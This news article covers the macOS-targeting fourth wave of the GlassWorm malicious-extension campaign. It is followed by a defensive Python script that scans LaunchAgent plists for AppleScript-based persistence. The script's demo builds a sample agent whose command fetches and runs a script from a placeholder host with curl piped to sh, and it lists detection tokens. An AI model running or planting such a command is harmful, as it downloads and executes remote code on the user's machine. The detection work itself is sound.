New Glassworm Malware Wave Targets Macs With Trojanized Crypto Wallets
A fourth wave of the "GlassWorm" campaign is targeting macOS developers with malicious VSCode/OpenVSX extensions that deliver trojanized versions of crypto wallet applications.
Extensions in the OpenVSX registry and the Microsoft Visual Studio Marketplace expand the capabilities of a VS Code-compatible editor by adding features and productivity enhancements in the form of development tools, language support, or themes.
The Microsoft marketplace is the official extension store for Visual Studio Code, whereas OpenVSX serves as an open, vendor-neutral alternative, primarily used by editors that do not support or choose not to rely on Microsoft's proprietary marketplace.
The GlassWorm malware first appeared on the marketplaces in October, hidden inside malicious extensions using "invisible" Unicode characters.
Once installed, the malware attempted to steal credentials for GitHub, npm, and OpenVSX accounts, as well as data from multiple cryptocurrency wallet extensions. It also supported remote access through VNC and could route traffic through the victim's machine via a SOCKS proxy.
Despite the public exposure and increased defenses, GlassWorm returned in early November on OpenVSX and then again in early December on the VS Code marketplace.
Koi Security researchers discovered a new GlassWorm campaign that targets macOS systems exclusively, a departure from the previous waves, which focused only on Windows.
Instead of the invisible Unicode seen in the first two waves, or the compiled Rust binaries used in the third, the most recent GlassWorm attacks use an AES-256-CBC-encrypted payload embedded in the compiled JavaScript of the OpenVSX extensions.
The malicious logic executes after a 15-minute delay, likely in an attempt to evade analysis in sandboxed environments.
Instead of PowerShell, it now uses AppleScript, and instead of Registry modification, it uses LaunchAgents for persistence. The Solana blockchain-based command-and-control (C2) mechanism remains unchanged, though, and the researchers report infrastructure overlap with the earlier waves.
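The combination reported above (AppleScript execution plus LaunchAgent persistence) is something a macOS developer can check for directly. The following is an added hunting example, not code from Koi Security or from the article: it parses every plist under a LaunchAgents directory with the standard library's plistlib (which handles both XML and binary plists) and flags agents whose command line invokes osascript, runs code out of an editor extension directory, or restarts itself via RunAtLoad/KeepAlive. The indicator strings are heuristic assumptions chosen from the behaviour the article describes, not published IOCs, and the two plists in demo() are constructed samples written to a temporary directory.

```python
"""Heuristic hunt for suspicious macOS LaunchAgents (added example, not the article's code)."""
import plistlib
import tempfile
from pathlib import Path

# Heuristic indicators (assumptions, not published IOCs). The macOS GlassWorm wave is
# reported to run AppleScript and persist through LaunchAgents, so we look for agents
# that call osascript or launch code from a VS Code / VSCodium extension directory.
SUSPICIOUS_TOKENS = (
    "osascript",                 # AppleScript interpreter
    "/.vscode/extensions/",      # VS Code extension directory (assumed path)
    "/.vscode-oss/extensions/",  # VSCodium / OSS build extension directory (assumed path)
)

# Where launchd picks up per-user and system-wide agents on macOS.
DEFAULT_LAUNCH_AGENT_DIRS = (
    Path.home() / "Library" / "LaunchAgents",
    Path("/Library/LaunchAgents"),
)


def program_line(plist):
    """Reconstruct the command a LaunchAgent runs from Program and/or ProgramArguments."""
    parts = []
    if "Program" in plist:
        parts.append(str(plist["Program"]))
    parts.extend(str(arg) for arg in plist.get("ProgramArguments", []))
    return " ".join(parts)


def suspicious_reasons(plist):
    """Return a list of human-readable reasons this agent looks suspicious (empty if clean)."""
    cmd = program_line(plist)
    reasons = [f"command references {token!r}" for token in SUSPICIOUS_TOKENS if token in cmd]
    # An inline "-e" script means the AppleScript body is hidden in the plist, not a file on disk.
    if "osascript" in cmd and " -e " in f" {cmd} ":
        reasons.append("inline AppleScript (-e) rather than a script file")
    # Only worth mentioning when something else already looks off; many benign agents use these.
    if reasons and plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad+KeepAlive (restarts if killed)")
    return reasons


def scan_launch_agents(directory):
    """Scan one directory of .plist files; returns [(filename, label, reasons), ...]."""
    findings = []
    for plist_path in sorted(Path(directory).glob("*.plist")):
        try:
            with open(plist_path, "rb") as fh:
                plist = plistlib.load(fh)  # XML or binary plist
        except Exception as exc:  # malformed plist is itself worth a look
            findings.append((plist_path.name, "<unparseable>", [f"parse error: {exc}"]))
            continue
        reasons = suspicious_reasons(plist)
        if reasons:
            findings.append((plist_path.name, plist.get("Label", "<no label>"), reasons))
    return findings


def demo():
    """Write two constructed plists to a temp dir and scan them; returns the findings."""
    benign = {
        "Label": "com.example.backup",
        "ProgramArguments": ["/usr/local/bin/backup", "--daily"],
        "StartInterval": 86400,
    }
    # Constructed sample modelled on the reported behaviour: delayed start, AppleScript, persistence.
    suspicious = {
        "Label": "com.example.updater",
        "ProgramArguments": [
            "/bin/sh", "-c",
            "sleep 900; osascript -e 'do shell script \"curl -fsSL https://example.invalid/p | sh\"'",
        ],
        "RunAtLoad": True,
        "KeepAlive": True,
    }
    with tempfile.TemporaryDirectory() as tmp:
        for label, plist in ((benign["Label"], benign), (suspicious["Label"], suspicious)):
            with open(Path(tmp) / f"{label}.plist", "wb") as fh:
                plistlib.dump(plist, fh)
        return scan_launch_agents(tmp)


if __name__ == "__main__":
    for directory in DEFAULT_LAUNCH_AGENT_DIRS:
        for name, label, reasons in scan_launch_agents(directory):
            print(f"{directory / name} [{label}]")
            for reason in reasons:
                print(f"    - {reason}")
```

On a real machine, run the script as the developer whose editor is in question; a hit is a starting point for triage (inspect the referenced script or extension directory, check its install date against the extension's), not proof of compromise, since legitimate tools also use osascript and KeepAlive.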
Source: BleepingComputer